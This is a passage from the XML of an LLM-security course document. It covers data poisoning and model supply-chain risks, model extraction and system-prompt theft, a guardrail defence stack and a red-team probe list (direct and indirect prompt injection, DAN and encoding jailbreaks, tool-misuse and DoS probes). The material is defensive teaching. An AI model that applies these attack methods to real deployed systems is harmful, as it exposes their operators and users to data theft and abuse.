              <w:t>SFT / DPO data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>labeller plants harmful examples</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>provenance + spot-check + diversity filter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Pretraining corpus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Common Crawl includes planted text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>rely on base model + post-train filters; open problem</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Vector DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>embeddings always rank top-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>sign embeddings; verify on read</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Model supply chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>malicious model on HF Hub</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>pin commit; safetensors only; never trust_remote_code from untrusted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🚨 PICKLE IS RCE. A PyTorch .bin or .pkl can execute arbitrary code on load. Use safetensors (M56) exclusively for untrusted models. Anthropic / Meta / Google all distribute safetensors today.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1865C5"/>
        </w:rPr>
        <w:t>8. Model extraction / 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22D2D"/>
              </w:rPr>
              <w:t>Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="B22D2D"/>
              </w:rPr>
              <w:t>Goal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Model fingerprinting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>identify what model you're serving</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Prompt theft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>reverse-engineer your secret system prompt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>API distillation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>scrape (prompt, response) pairs to train a competitor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Membership inference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>did a specific record train your model?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Weight reconstruction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>enough queries can reveal weights of small models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Defences:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>• Watermarking — token-bias method (Kirchenbauer et al. 2023) or output-side signatures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>• Rate limits + canary keys per API key</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>• Output diversification (small temperature) defeats some extraction attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>• Provenance signatures — sign generated content with a key downstream can verify</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>• C2PA / Content Credentials for binaries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1865C5"/>
        </w:rPr>
        <w:t>9. The defence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22D2D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  <w:color w:val="B22D2D"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>1. Input screening</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>NeMo Guardrails · Guardrails AI · Lakera Guard · Llama Guard 3 · Prompt-Guard · DeBERTa-PromptInject</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>2. Policy / tool validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>LangChain Pydantic output parsers; per-tool allowlist (M64 / M72)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>3. Output filtering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Llama Guard 3 on output; Presidio PII redact; JSON-schema (vLLM guided decoding); HTML sanitiser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>4. Runtime / network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Firecracker / gVisor / Browserbase; egress blocks for SSRF + cloud-metadata; rate limits + budgets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>5. Observability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>OTel traces (M51); Langfuse / Phoenix anomaly detection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safe_chat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user_input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llm_call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looks_injected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user_input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"Sorry, I can't help with that."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llm_call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user_input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redact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looks_injected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"[response withheld]"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audit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stage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"chat"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user_in_hash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sha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user_input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resp_hash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sha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Minimal pre+post guard pattern — wrap every LLM call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INPUT GUARD — fast classifier before the model runs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Polite refusal; never echo the input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Forward only safe inputs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OUTPUT GUARD — strip PII / secrets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Catch data-exfil attempts even when the LLM was tricked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AUDIT — every prompt + response hashed for the trace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Return the cleaned response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1865C5"/>
        </w:rPr>
        <w:t>10. Red-team workflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Tools to know: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22D2D"/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="B22D2D"/>
              </w:rPr>
              <w:t>What</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>garak (NVIDIA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>open-source LLM scanner; ~250 probes for injection / jailbreak / leak</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Promptfoo (M70)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>YAML test cases with policy / factuality / red-team plugins</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>PyRIT (Microsoft)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>multi-turn red-team orchestration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>giskard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>LLM + tabular testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>deepeval</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>unit tests for hallucination / bias / toxicity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Probes you should always run:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>• Direct injection — 50+ variants</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>• Indirect injection — poisoned RAG chunk; poisoned tool output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>• 10 jailbreak families (DAN, encoding, multi-turn, suffix, translation)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>• PII extraction probes against the system prompt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>• Tool-misuse probes (delete_*, transfer_*, send_* with malicious args)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>• DoS probes (giant context, recursive tool calls, expensive prompts)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="216" w:right="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1865C5"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>🔑 Treat red-team as REGRESSION TESTS. Block the deploy if pass-rate drops. Track failure rate per category as a Grafana panel (M50). Add new probes after every public incident.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OWASP LLM Top 10 (2025) = one-page threat model</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>• Prompt injection has 3 flavours — direct, INDIRECT (the dangerous one), multimodal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>• Jailbreaks target alignment; injections target your system prompt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>• LLM output is untrusted code — every sink (DOM/SQL/shell/URL/file) needs a sanitiser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>• Tool/agent abuse = the new RCE. Least privilege + scoped args + HITL + audit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>• Data poisoning spans RAG, SFT, vector DB, pretraining, supply chain — safetensors only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>• Defence stack: NeMo / Guardrails AI / Llama Guard / Prompt-Guard / Lakera + audit logs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>• Red-team in CI: garak + Promptfoo + PyRIT. Block deploys on regressions.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